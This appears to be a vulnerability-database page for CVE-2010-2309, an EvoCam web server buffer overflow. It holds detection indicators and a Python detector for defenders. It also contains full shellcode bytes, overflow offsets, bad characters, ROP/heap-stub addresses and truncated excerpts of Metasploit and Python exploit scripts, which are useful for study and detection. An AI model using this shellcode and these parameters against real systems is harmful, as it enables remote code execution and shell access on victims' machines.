CVE-2010-2309
Published: 2010-06-16
Priority: P2 (61) · Severity: high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit code indexed (see the Exploit-DB and Metasploit entries below)
EPSS: 50.84% (98.8th percentile)

Buffer overflow in the web server for EvoLogical EvoCam 3.6.6 and 3.6.7 allows remote attackers to execute arbitrary code via a long GET request.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| evological | evocam | — | — |
| evological | evocam | — | — |
Detection & IOCs (extracted from sources)

Byte pattern (payload bytes from the public exploit code listed below):

```text
\xdb\xd2\x29\xc9\xb1\x27\xbf\xb1\xd5\xb6\xd3\xd9\x74\x24\xf4\x5a\x83\xea\xfc\x31\x7a\x14\x03\x7a\xa5\x37\x43\xe2\x05\x2e\xfc\x45\xd5\x11\xad\x17\x65\xf0\x80\x18\x8a\x71\x64\x19\x94\x75\x10\xdf\xc6\x27\x70\x88\xe6\xc5\x65\x14\x6f\x2a\xef\xb4\x3c\xfb\xa2\x04\xaa\xce\xc3\x17\x4d\x83\x95\x85\x21\x49\xd7\xaa\x33\xd0\xb5\xf8\xe5\xbe\x89\xe3\xc4\xbf\x98\x4f\x5f\x78\x6d\xab\xdc\x6c\x8f\x08\xb1\x25\xc3\x3e\x6f\x07\x63\x4c\xcc\x14\x9f\xb2\xa7\xeb\x51\x75\x17\x5c\xc2\x25\x27\x67\x2f\x45\xd7\x08\x93\x6b\xa2\x21\x5c\x31\x81\xb2\x1f\x4c\x19\xc7\x08\x80\xd9\x77\x5f\xcd\xf6\x04\xf7\x79\x27\x89\x6e\x14\xbe\xae\x21\xb8\x93\x60\x72\x03\xde\x01\x43\xb4\xb0\x88\x47\x64\x60\xd8\xd7\xd5\x30\xd9\x1a\x55\x01\x26\xf4\x06\x21\x6b\x75\xac
```
- The exploit triggers via an oversized HTTP GET request; for EvoCam 3.6.6 the overflow offset is 1560 bytes, for 3.6.7 it is 1308 bytes. Detect anomalously long GET request URIs to port 8080 targeting EvoCam.
- The exploit sends a raw HTTP/1.0 GET request with no Host header and a payload-filled URI; pattern-match on `GET ` followed by more than 1300 bytes of non-path data before ` HTTP/1.0`.
- The ROP chain uses dyld addresses (0x8fe*) as gadgets; memory forensics or crash dumps showing EIP/RET targets in the 0x8fe00000–0x8fe70000 range on OS X 10.5.8 are indicative of exploitation.
- The Metasploit module's bad characters for payload encoding are `\x00\xff\x09\x0a\x0b\x0c\x0d\x20`; IDS signatures should flag GET requests containing long runs of bytes that avoid these values.
- The exec-from-heap stub begins with a fixed 4-byte fragment `\x90\x58\x61\xc3` (nop / pop eax / popa / ret) immediately followed by the setjmp address 0x8fe1cf38; this byte sequence in a GET URI is a strong exploit indicator.
- A reverse shell callback is expected on port 4444 after successful exploitation; monitor for unexpected outbound or inbound connections on TCP/4444 involving the EvoCam host process.
- EvoCam 3.6.8 patches the vulnerability; detections and mitigations are only relevant for versions 3.6.6 and 3.6.7 (and possibly earlier).
- CVE-2010-2309 is also referenced by a separate UFO: Alien Invasion IRC client exploit (EDB-16864); ensure detections are scoped to the EvoCam HTTP vector (port 8080 GET overflow) and not confused with the IRC vector (port 6667).
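As an added example (not code from this page or from any of the exploit authors), the detection heuristics listed above turned into a small Python checker run over constructed HTTP requests. The URI-length threshold, the missing Host header, the exec-from-heap stub followed by the little-endian setjmp address, and the dyld gadget range 0x8fe00000–0x8fe70000 come from the IOC list; the printable-byte ratio check and the "two or more indicators" scoring are this example's own assumptions, added so that a long but ordinary URL is not flagged on length alone.

```python
import re
import struct

# Thresholds and byte patterns come from the IOC list for CVE-2010-2309; the
# printable-ratio heuristic and the scoring rule are this example's assumptions.
URI_LEN_THRESHOLD = 1300                      # 3.6.7 offset is 1308, 3.6.6 is 1560
EXEC_FROM_HEAP_STUB = b"\x90\x58\x61\xc3" + struct.pack("<I", 0x8FE1CF38)
DYLD_LOW, DYLD_HIGH = 0x8FE00000, 0x8FE70000  # dyld gadget range, OS X 10.5.8
BINARY_RATIO_THRESHOLD = 0.3                  # assumption: non-printable URI bytes

# Request line. The bad-character set excludes space, CR and LF, so a
# payload-filled URI still matches \S+ and the request line still parses.
REQUEST_LINE = re.compile(rb"\A([A-Z]+) (\S+) HTTP/(1\.[01])\r?\n")


def analyze_request(raw: bytes) -> dict:
    """Score one raw HTTP request for CVE-2010-2309 exploitation indicators."""
    findings = {"long_get": False, "no_host": False, "binary_uri": False,
                "heap_stub": False, "dyld_ptr": False, "score": 0}
    m = REQUEST_LINE.match(raw)
    if not m or m.group(1) != b"GET":
        return findings
    uri = m.group(2)
    headers = raw.split(b"\r\n\r\n", 1)[0]

    findings["long_get"] = len(uri) > URI_LEN_THRESHOLD
    findings["no_host"] = re.search(rb"\r\nHost:", headers, re.IGNORECASE) is None
    non_printable = sum(1 for b in uri if not 0x21 <= b <= 0x7E)
    findings["binary_uri"] = non_printable / len(uri) > BINARY_RATIO_THRESHOLD
    findings["heap_stub"] = EXEC_FROM_HEAP_STUB in uri
    # Look at every 4-byte window, aligned or not, for a little-endian dyld pointer.
    findings["dyld_ptr"] = any(
        DYLD_LOW <= struct.unpack_from("<I", uri, i)[0] < DYLD_HIGH
        for i in range(len(uri) - 3)
    )
    # One indicator alone is weak (a long URL is not an attack); count how many stack.
    findings["score"] = sum(1 for k, v in findings.items() if k != "score" and v)
    return findings


def scan(requests):
    """Return (index, findings) for every request showing at least two indicators."""
    scored = ((i, analyze_request(r)) for i, r in enumerate(requests))
    return [(i, f) for i, f in scored if f["score"] >= 2]


# Constructed sample traffic, not captured data.
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: cam.example.test\r\n\r\n"
LONG_BUT_TEXT = b"GET /" + b"a" * 1400 + b" HTTP/1.1\r\nHost: cam.example.test\r\n\r\n"
SUSPECT = b"GET /" + b"A" * 1308 + EXEC_FROM_HEAP_STUB + b"B" * 200 + b" HTTP/1.0\r\n\r\n"
SAMPLES = [BENIGN, LONG_BUT_TEXT, SUSPECT]

if __name__ == "__main__":
    for idx, f in scan(SAMPLES):
        hits = ", ".join(k for k, v in f.items() if v is True)
        print(f"request {idx}: score={f['score']} ({hits})")
```

Run stand-alone, only the third sample is reported: it is long, lacks a Host header, carries the stub bytes, and contains a dword in the dyld range. The second sample is over the length threshold but scores one, which is the point of stacking indicators before alerting.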
No detection rules found.
Exploit-DB
Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit)
Exploit-DB · 2010-10-09 · CVE-2010-2309
---
```ruby
##
# $Id: evocam_webserver.rb 10617 2010-10-09 06:55:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MacOS X EvoCam HTTP GET Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the web server provided with the EvoCam
				program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload
				from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,
				3.6.7, and possibly earlier vers
```
Exploit-DB
UFO: Alien Invasion IRC Client (OSX) - Remote Buffer Overflow (Metasploit)
Exploit-DB · 2010-10-09 · CVE-2010-2309
---
```ruby
##
# $Id: ufo_ai.rb 10617 2010-10-09 06:55:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UFO: Alien Invasion IRC Client Buffer Overflow Exploit',
			'Description'    => %q{
					This module exploits a buffer overflow in the IRC client component
					of UFO: Alien Invasion 2.2.1.
			},
			'Author'         =>
				[
					'Jason Geffner', # Original Windows PoC Author
					'dookie'         # OSX Exploit Author
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10617 $',
			'References'     =>
				[
					[ 'CVE', '201
```
Exploit-DB
Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow
Exploit-DB · 2010-07-06 · CVE-2010-2309
---
```python
#!/usr/bin/python
# EvoCam Web Server OSX 3.6.6 and 3.6.7
import socket
import struct

SHELL = ("\xdb\xd2\x29\xc9\xb1\x27\xbf\xb1\xd5\xb6\xd3\xd9\x74\x24"
         "\xf4\x5a\x83\xea\xfc\x31\x7a\x14\x03\x7a\xa5\x37\x43\xe2"
         "\x05\x2e\xfc\x45\xd5\x11\xad\x17\x65\xf0\x80\x18\x8a\x71"
         "\x64\x19\x94\x75\x10\xdf\xc6\x27\x70\x88\xe6\xc5\x65\x14"
         "\x6f\x2a\xef\xb4\x3c\xfb\xa2\x04\xaa\xce\xc3\x17\x4d\x83"
         "\x95\x85\x21\x49\xd7\xaa\x33\xd0\xb5\xf8\xe5\xbe\x89\xe3"
         "\xc4\xbf\x98\x4f\x5f\x78\x6d\xab\xdc\x6c\x8f\x08\xb1\x25"
         "\xc3\x3e\x6f\x07\x63\x4c\xcc\x14\x9f\xb2\xa7\xeb\x51\x75"
         "\x17\x5c\xc2\x25\x27\x67\x2f\x45\xd7\x08\x93\x6b\xa2\x21"
         "\x5c\x31\x81\xb2\x1f\x4c\x19\xc7\x08\x80\xd9\x77\x5f\xcd"
         "\xf6\x04\xf7\x79\x27\x89\x6e\x14\xbe
```
Exploit-DB
Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Remote Buffer Overflow
Exploit-DB · 2010-06-05 · CVE-2010-2309
---
```python
#!/usr/bin/python
# Exploit Title: OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7
# Date: 1st June 2010
# Author: d1dn0t ( didnot __A-T__ me.com )
# Software Link: http://www.pizza.org/evocam.dmg
# Version: EvoCam 3.6.6 and 3.6.7
# Tested on: OS X 10.5.8 Intel

import socket
import sys
import struct
from optparse import OptionParser

# OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7
# Tested on Leopard 10.5.8 Intel
# Paul Harrington didnot __A-T__ me.com
#
# $ ./evocam.py -H 192.168.1.28 -P 8080 -T 2
# EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow Exploit
# didnot __A-T__ me.com
# Targeting EvoCam Version 3.6.7
# [+] Sending evil buffer...
# [+] Done!
# [*] Check your s
```
Metasploit
MacOS X EvoCam HTTP GET Buffer Overflow
Metasploit module
This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.
No writeups or analysis indexed.